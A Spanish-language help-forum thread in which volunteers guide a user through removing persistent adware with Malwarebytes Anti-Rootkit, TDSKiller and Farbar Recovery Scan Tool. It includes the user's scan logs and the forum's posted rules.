Infectado con Usfin.net ADfly adware

Hola que tal

Perdón por la tardanza, intentemos lo siguiente

• Descarga Malwarebytes-AntiRootkits sigues las instrucciones de su manual y me traes sus correspondientes Informes de análisis: Mbar-log.txt y System-log.txt tal como se indica en su manual (Actualizando la Database).

• Descarga, instala y ejecuta TDSKiller. Marca todas las casillas (Loaded Modules, Verify file digital signatures y Detect TDLFS file system). Sí te pide reiniciar lo haces, ejecutas de nuevo la herramienta y al marcar nuevamente las casillas que te he dicho, ya te dejara analizar.

Traes los reportes y comentas

Saludos

Buenas @hectordj69 realiza los pasos que te ha comentado mi compañero @DanielG si con los procedimientos que te ha comentado mi compañero @DanielG no se soluciona dicho problema intentaría solucionar yo tu problema.

Un saludo.

Gracias sus respuestas amigos. Aqui los reportes solicitados.

Malwarebytes Anti-Rootkit BETA 1.10.3.1001

Database version: main: v2021.12.30.04 rootkit: v2021.12.30.04

Windows 10 x64 NTFS Internet Explorer 11.789.19041.0 Spices :: DESKTOP-RLQ6923 [administrator]

12/30/2021 8:53:02 AM mbar-log-2021-12-30 (08-53-02).txt

Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 319878 Time elapsed: 18 minute(s), 59 second(s)

Memory Processes Detected: 0 (No malicious items detected)

Memory Modules Detected: 0 (No malicious items detected)

Registry Keys Detected: 0 (No malicious items detected)

Registry Values Detected: 0 (No malicious items detected)

Registry Data Items Detected: 0 (No malicious items detected)

Folders Detected: 0 (No malicious items detected)

Files Detected: 0 (No malicious items detected)

Physical Sectors Detected: 0 (No malicious items detected)

(end)

Falta el reporte de System-log.txt de malwarebytes y los de tsskiller

Saludos

El de TDSKiller esta adjunto por que es demasiado largo.

TDSKiller.txt (120,0 KB)

Malwarebytes system-log.txt (133,0 KB) System-log.txt

Hola nuevamente

Pareciera estar limpio segun los reportes.

Descarga Kaspersky Virus Removal Tool y ejecutalo siguiendo su manual. Cuando termine trae el reporte

Descarga HitmanPro en su manual viene explicado como utilizarlo correctamente. Traes el reporte

Abre ccleaner y realiza lo siguiente Vas a herramientas —>Inicio → Windows → guardar un archivo de texto Pegas ese reporte en tu proxima respuesta. Luego nuevamente en ccleaner vas a herramientas —>Inicio → Tareas programadas → guardar un archivo de texto. Y lo pegas en tu proxima respuesta.

Comenta como va todo

Saludos

Hola buenas @hectordj69.

Con permiso de mis compañeros @DanielG y @Chicloi.

Viendo tu caso, los reportes y por todo lo que comentas. Todo apunta a que tienes Adware persistente y que no se eliminará así como así.

Antes que nada debo de informarte que en este foro nunca se han atendido casos en los que hay una empresa profesional por el medio. Y aún menos a un servicio de IT que trabaja para ‘X’ empresa comercial. Si no que siempre se han atendido a particulares o usuarios finales como tal.

Esto básicamente es por los siguientes motivos:

1. En este foro utilizamos algunas herramientas de alto alcance. No hay nada 100 x 100 seguro y algo en la desinfección de la máquina podría ir mal y torcerse la cosa. Todo y que tomamos medidas oportunas para que si algo se tuerce, se pueda arreglar, a veces no siempre es posible.

2. Si es una empresa comercial para la que tú trabajas @hectordj69, se supone que esta empresa debería de pagar a un servicio IT real y especializado para afrontar este tipo de situaciones y que este servicio de IT las debería de resolver sin ningún problema.

Dicho esto, tú eres el servicio IT:

Por tanto, deberías de tener los conocimientos suficientes y necesarios para afrontar esta situación sin problemas.

Debería de cerrar este tema y no dejarlo seguir. Pero como el tema ya ha avanzado bastante, te han ido ayudando otros compañeros mios y eres un usuario nuevo. Pues lo dejaré abierto y con permiso de @DanielG, @Chicloi y tuyo @hectordj69 voy a pasar a llevar el caso, ya que utilizaremos FRST (FARBAR).

Pues si no, no podremos eliminar este malware. Pero que quede claro que dicha herramienta es de alto alcance, eso quiere decir que si no se utiliza correctamente o no sigues las instrucciones que te diga, pues podrían pasar cosas que no deberían de pasar.

Antes de ir a utilizar esta herramienta, que quede muy claro tanto para ti como para la empresa en la cual trabajas que:

Una empresa tiene que pagar por un servicio IT real que pueda afrontar estas situaciones sin problema.

, así que excepcionalmente haremos una excepción y atenderemos tu caso.

Dicho todo esto, antes de ir con FRST quiero que te leas las políticas del foro políticas y que estés totalmente de acuerdo y respectes todas las políticas del foro, pero en especial y sobre todo las siguientes:

1.1 El uso de esta comunidad constituye que usted acepta estos términos de uso y cualquier modificación que se realice en los mismos. El hecho de ignorar o desconocer las normas y políticas de InfoSpyware, no eximen a ningún usuario de su cumplimiento. Nos reservamos el derecho de excluir o negar el ingreso a todo aquel que no cumpla éstas, o esté en desacuerdo con las mismas.

1.3 Nos reservamos el derecho de mover, borrar, editar o cerrar temas o mensajes que incumplan las normas y políticas establecidas o por cuestiones administrativas, a nuestra discreción y sin dar ninguna explicación previa o posterior.

2.5 No está permitido repetir uno o más temas con respecto al mismo asunto, ni publicar dos o más mensajes cuyos contenidos coincidan dentro de un mismo tema. Dichos temas o mensajes publicados podrán ser eliminados o unidos sin previo o posterior aviso.

2.6 Por la seguridad de nuestros usuarios, esta restringida la utilización de herramientas potentes en la detección y eliminación de Malwares como pueden ser HijackThis, OTL, DDS, FARBAR y ComboFix, al igual que el uso de Scripts personalizados y/o Batch, como así cualquier otra herramienta/programa que no se encuentre disponible desde nuestro sitio principal www.infospyware.com y/o en Guías o Tutoriales del foro, solo podrán ser recomendados por los integrantes de nuestro Staff especializado

2.7 Los moderadores se reservan el derecho de editar, modificar o directamente borrar sin previo aviso, todas aquellas respuestas que consideren erróneas a la hora de contribuir con la ayuda a otro usuario, que enreden o desvirtúen el tema principal.

5.1 Estamos para ayudar pero somos humanos y podemos equivocarnos por lo que el equipo de InfoSpyware NO se hace responsable por cualquier tipo de daño en su sistema, mal uso de las guías, manuales, consejos, recomendaciones de los pasos a seguir, programas brindados, etc. Use éstos bajo su responsabilidad!

5.2 Recuerden que: NO somos una empresa que le cobra por los servicios, NO somos un servicio técnico, NO atendemos las 24hrs, somos humanos, tenemos también nuestros trabajos, responsabilidades, problemas y familias que atender; somos voluntarios. En conclusión, sólo somos una COMUNIDAD (FORO) DE AYUDANTES VOLUNTARIOS que intentarán ayudarle sin fines de lucro, sin pedirle nada a cambio más que se respeten estas normas y políticas. Sobre todo respeto y camaradería a quienes voluntariamente dedican su tiempo en intentar ayudar a otros.

Si estas de acuerdo con todo esto. Dímelo y vamos con FRST para solventar tu problema. En caso contrario, dímelo también.

Salu2 a tod@s.

@Marr0n Buenos dias y mucho gusto! Gracias por aclararme todas estas cosas y estoy de acuerdo completamente con las politicas.

Comprendo que hay procedimientos delicados y estoy dispuesto a seguir al pie de la letra sus instrucciones, de antemano muchas gracias.

de acuerdo. Pues si estás conforme con todo lo que he dicho… Vamos allá.

Desactivas tu antivirus Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad que tengas activado.

LO DESCARGAS EN TU ESCRITORIO MUY IMPORTANTE (y no en otro sitio).

Descargas Farbar Recovery Scan Tool MUY IMPORTANTE >> seleccionas la versión adecuada para la arquitectura correspondiente de tu Ordenador (32 o 64bits). ¿Cómo saber si mi Windows es de 32 o 64 bits.?

Una vez descargado FRST, desconectas tu equipo de completamente de Internet (apagas el router) >> Super Importante. Acto seguido, cierras también cualquier otro programa que tengas abierto.

Farbar Recovery Scan Tool

1. Ejecutas el FRST.exe (Si utilizas Windows Vista/7/8 o 10, presionas click derecho y seleccionas Ejecutar como Administrador).

2. Aparecerá una ventana con un mensaje de Disclaimer/Responsabilidad, presionas sobre Si o Yes.

3. En la ventana principal del programa presionas sobre Analizar/Scan y esperas a que finalice el análisis.

4. Aparecerán dos logs/reportes que serán: Frst.txt y Addition.txt, estos quedarán guardados en el escritorio.

Activas de nuevo tu antivirus y cualquier programa de seguridad que tengas activado. También conectas nuevamente tu equipo a Internet.

PRÓXIMA RESPUESTA

Pegas los reportes de FRST y Addition.txt. Debes de poner ambos reportes todos enteros con absolutamente todo su contenido. Deberás de realizar varios mensajes si recibes un mensaje de error/advertencia indicando que es muy largo dicho reporte que formará el mensaje (más de 50.000 carácteres aprox.).

NOTA IMPORTANTE

Por Favor, mientras estemos desinfectando tu maquina o terminando de hacerlo:

• No realices pasos/acciones que NOSOTROS no te hayamos indicado.
• No descargues NADA de Internet y/o conectes dispositivos externos a tu equipo.
• No instales NADA (programas/software/complementos/extensiones del navegador…).
• No ejecutes otros programas de seguridad (Antivirus, Antimalware, ANTINADA…).
• No realices por tu cuenta otros procedimientos.
• Usa tu equipo EXCLUSIVAMENTE para desinfectarlo siguiendo nuestras indicaciones.

Muy Importante Coloca los diferentes reportes que te he pedido como se muestra en la siguiente imagen:

report703×272 3.73 KB

Salu2.

Hola, buenas @hectordj69

He visto que recientemente te has conectado en el foro.

¿Pudiste realizar algún avance?

Salu2.

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-12-2021
Ran by Spices (06-01-2022 08:41:55)
Running from C:\Users\Spices\OneDrive\Documents\OneDrive\Desktop
Microsoft Windows 10 Pro Version 21H1 19043.1415 (X64) (2020-11-13 17:18:33)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1001776605-1151265979-3107129937-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1001776605-1151265979-3107129937-503 - Limited - Disabled)
Guest (S-1-5-21-1001776605-1151265979-3107129937-501 - Limited - Disabled)
QBDataServiceUser27 (S-1-5-21-1001776605-1151265979-3107129937-1002 - Limited - Enabled) => C:\Users\TEMP.DESKTOP-RLQ6923.005
Spices (S-1-5-21-1001776605-1151265979-3107129937-1001 - Administrator - Enabled) => C:\Users\Spices
WDAGUtilityAccount (S-1-5-21-1001776605-1151265979-3107129937-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Spybot - Search and Destroy (Disabled - Out of date) {F77C7796-45C4-531E-0DAE-B4A8229B11C8}
AV: ESET Security (Disabled - Up to date) {89B55CC4-3881-78B2-11E2-479AE0371896}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Antivirus (Enabled - Up to date) {F4A6BD41-306E-5B9F-464B-23E1AE81F649}
FW: AVG Antivirus (Enabled) {77FCDD80-5C3B-5549-57A4-B1A62BD5FB8F}
FW: ESET Firewall (Enabled) {B18EDDE1-72EE-79EA-3ABD-EEAF1EE45FED}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat DC (64-bit) (HKLM\...\{AC76BA86-1033-1033-7760-BC15014EA700}) (Version: 21.007.20099 - Adobe)
Backup and Sync from Google (HKLM\...\{685BAD50-A3AA-4B91-A15B-77F9DC7346D4}) (Version: 3.57.4043.4118 - Google, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.87 - Piriform)
CCleaner Browser (HKLM-x32\...\CCleaner Browser) (Version: 96.1.13589.113 - Piriform Software)
CCleaner Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1067.0 - Piriform Software) Hidden
Data Lifeguard Diagnostic for Windows 1.31 (HKLM-x32\...\{519C4DB6-B53B-4F5C-8297-89B2BE949FA5}_is1) (Version:  - Western Digital Corporation)
DesignPro 5.4 Limited Edition (HKLM-x32\...\InstallShield_{71F6DF7D-B639-4FAD-BA93-E6DF267AA44D}) (Version: 5.2.1201 - Avery Dennison)
ESET Security (HKLM\...\{4DB10B50-978B-4DB0-8127-79F8D302AC5A}) (Version: 15.0.21.0 - ESET, spol. s r.o.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 96.0.4664.110 - Google LLC)
Google Drive (HKLM\...\{6BBAE539-2232-434A-A4E5-9A33560C6283}) (Version: 54.0.2.0 - Google LLC)
HP Color LaserJet MFP M278-M281 Help (HKLM-x32\...\{3DF29BF3-A40D-4BDC-BE5D-FA592999A767}) (Version: 0.00.0005 - HP)
HP ColorLaserJet MFP M278-M281 Basic Device Software (HKLM\...\{61F983A9-6F6F-40F0-B4AA-FF2B17BAB911}) (Version: 44.1.2549.17189 - HP Inc.)
HP Dropbox Plugin (HKLM-x32\...\{EF65265C-816D-4992-A8CC-C91CDEC9ED33}) (Version: 36.0.102.68541 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{858E7C53-B406-4798-B4CA-761420FF2B5F}) (Version: 43.0.0.0 - HP)
HP FTP Plugin (HKLM-x32\...\{07DA4F28-63FA-43F7-A554-B159E9A7E649}) (Version: 43.0.0.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{CF634681-E024-430C-AFF2-B9EE43A7E452}) (Version: 36.0.102.68541 - HP)
HP OneDrive Plugin (HKLM-x32\...\{1E191DFB-7B91-4B11-AB95-884D59ECE599}) (Version: 36.0.0.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{1ED7BE66-39E7-4A65-8EEF-68CE80F3416C}) (Version: 43.0.0.0 - HP)
HPDiagnosticCoreDll (HKLM-x32\...\{9262B08F-E183-4FED-A2BD-23FF1A84EB79}) (Version: 1.0.15.0 - Hewlett Packard)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
Java 8 Update 191 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JeRM Process Viewer 1.1.0.3 (HKLM-x32\...\JeRM Process Viewer_is1) (Version:  - )
Malwarebytes version 4.4.11.149 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.4.11.149 - Malwarebytes)
Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.14701.20262 - Microsoft Corporation)
Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.14701.20262 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 96.0.1054.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 96.0.1054.62 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\OneDriveSetup.exe) (Version: 21.230.1107.0004 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Teams) (Version: 1.2.00.19260 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{29B15818-E79F-4AB0-8938-9410C807AD76}) (Version: 2.84.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MSRX (HKLM-x32\...\MSRXv2017) (Version: v2017 - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.14701.20262 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.14701.20248 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.14701.20262 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.14131.20278 - Microsoft Corporation) Hidden
Product Improvement Study for HP ColorLaserJet MFP M278-M281 (HKLM\...\{8ADB6C99-9D2B-4069-B9C7-995E517EFE28}) (Version: 44.1.2549.17189 - HP Inc.)
QuickBooks (HKLM-x32\...\{B52E01F1-D34E-4381-B590-28DFF3C0B647}) (Version: 27.0.4016.2702 - Intuit Inc.) Hidden
QuickBooks Desktop File Doctor (HKLM-x32\...\{07441683-C1C3-43BC-B3E7-F213B3A69B76}) (Version: 4.6.0.0 - Intuit Inc.)
QuickBooks Pro 2017 (HKLM-x32\...\{82F55A7D-6BEB-436B-A1DC-586E113782D7}) (Version: 27.0.4001.2702 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
RepairSolutions (HKLM-x32\...\{94FA6651-E735-48D4-950A-93291C14DB63}) (Version: 3.0.19 - Innova Electronics)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.8.68.0 - Safer-Networking Ltd.)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.19260 - Microsoft Corporation)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.25.8 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{B1E7D0FD-7CFE-4E0C-A5DA-0F676499DB91}) (Version: 3.2.2110.14001 - Microsoft Corporation)
Winmail Reader 1.2.15 (HKLM-x32\...\Winmail Reader_is1) (Version:  - Kopf)

Packages:
=========
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2019-11-05] (Autodesk Inc.)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_133.1.340.0_x64__v10z8vjag6ke6 [2021-12-13] (HP Inc.)
JAR File Opener -> C:\Program Files\WindowsApps\62307pauljohn.JARFileOpener_1.2.0.0_neutral__7sv5v3m8wq0b2 [2018-04-16] (pauljohn)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.11.12160.0_x64__8wekyb3d8bbwe [2021-12-22] (Microsoft Studios) [MS Ad]
Open Any File -> C:\Program Files\WindowsApps\38184CDCTech.495572C750D15_1.2.102.0_x64__vwv5vk6p12k08 [2018-08-24] (For Better Digital Life - 1st Famous Tool Provider)
Open File Viewer (Free) -> C:\Program Files\WindowsApps\SolvusoftCorporation.32792D4052C2D_1.1.2.0_x86__8gdaqrm1kfbzy [2018-04-16] (Solvusoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-09] (Microsoft Corporation)
Reader Notification Client -> C:\Program Files\WindowsApps\ReaderNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2019-11-21] (Adobe Systems Incorporated)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0 [2021-12-10] (Spotify AB) [Startup Task]

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Spices\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.19163.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Spices\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.19163.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [    GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2021-10-19] (Google LLC -> Google)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-12-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2021-10-19] (Google LLC -> Google)
ContextMenuHandlers5: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-12-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2006-01-19 04:36 - 2006-01-19 04:36 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2017\dbghelp.dll
2020-04-18 08:45 - 2020-04-18 08:45 - 000000000 ____L (Microsoft Corporation) [simlink -> C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppvIsvSubsystems32.dll] C:\Program Files (x86)\Microsoft Office\Root\Office16\AppVIsvSubsystems32.dll
2020-04-18 08:45 - 2020-04-18 08:45 - 000000000 ____L (Microsoft Corporation) [simlink -> C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2R32.dll] C:\Program Files (x86)\Microsoft Office\Root\Office16\c2r32.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
